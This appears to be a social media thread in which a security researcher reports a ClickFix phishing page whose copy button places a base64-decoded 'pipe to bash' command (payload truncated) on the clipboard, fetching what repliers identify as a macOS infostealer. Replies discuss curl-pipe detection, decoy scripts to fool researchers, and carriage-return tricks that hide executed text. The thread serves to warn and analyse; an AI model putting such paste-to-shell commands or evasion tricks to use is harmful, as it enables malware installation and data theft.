This is pretty well executed phishing.
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script https://gist.github.com/FiloSottile/385137f5ca2eabb51fd206bde2ff1d0a into bash.
They even detect piping, so to read it you have to run "curl | cat".
@filippo Interesting, I've only seen this for Windows users. Guess Linux is next.
But then again, `curl | bash` is probably what inspired this scam...
@filippo Have seen multiple of these by now.
But what is more interesting, how do you server-side detect that a script that is downloaded via curl is being or not?
Interesting, now I've to think what if they'd send you a different script when they detect this? Like one that is just designed to waste your time as a security researcher but does nothing. Combined with just sending a malicious script to a fraction of the victims would probably make it quite hard for researchers.
Or imagine you make this look like a legit service and 1/10th of the users running it get malwared π€
@fooker @filippo
Even that isn't really secure, I've seen tricks with encoding that caused what you see on screen and what gets executed to be dramatically different in the past as well.
Like one of the more basic examples was to add a stray "\r" in the middle of a line as that would cause it to overwrite everything that was before that on screen. But when executed it would just skip over cause it was seen as part of a string.
Besides using a literal Hex editor is there any console based tool to look at a text file without it parsing control and escape codes? Like @don-ho.bsky.social's #Notepadpp but for the CLI?
@filippo hmm.
βset writemind to "/tmp/lovemrtrump/"β
So cybercriminals really canβt help themselves but actually write to the victimβs disk in whose name theyβre conducting this heist?
π₯΄
@filippo the copy/paste technique is called #ClickFix . the site in the image is infected by TA2726's Keitaro which is well known for sending Windows folks to #SocGholish . what they do with macOS folks has changed over the years. i see they sent you to something that delivered what looks like Poseidon Stealer.
https://medium.com/@MateoPappa/letsdefend-poseidon-macos-stealer-hard-a796c85d8c72
Investigate the Poseidon macOS infostealer to identify how it infiltrated the system and to extract the stolen data. Employ forensic and malware analysis techniques to uncover the full extent of theβ¦
CryptoLek
Filippo Valsorda (ποΈπ Aug 1)
Felix 
Eckhofer
ComputerNut43
SpaceLifeForm
Klaus Frank
fooker
b-loved dreamer
Britta
David Leadbeater
Adam
Toni Aittoniemi
Randy
Joshua Small
MarkAssPandi
kechpaja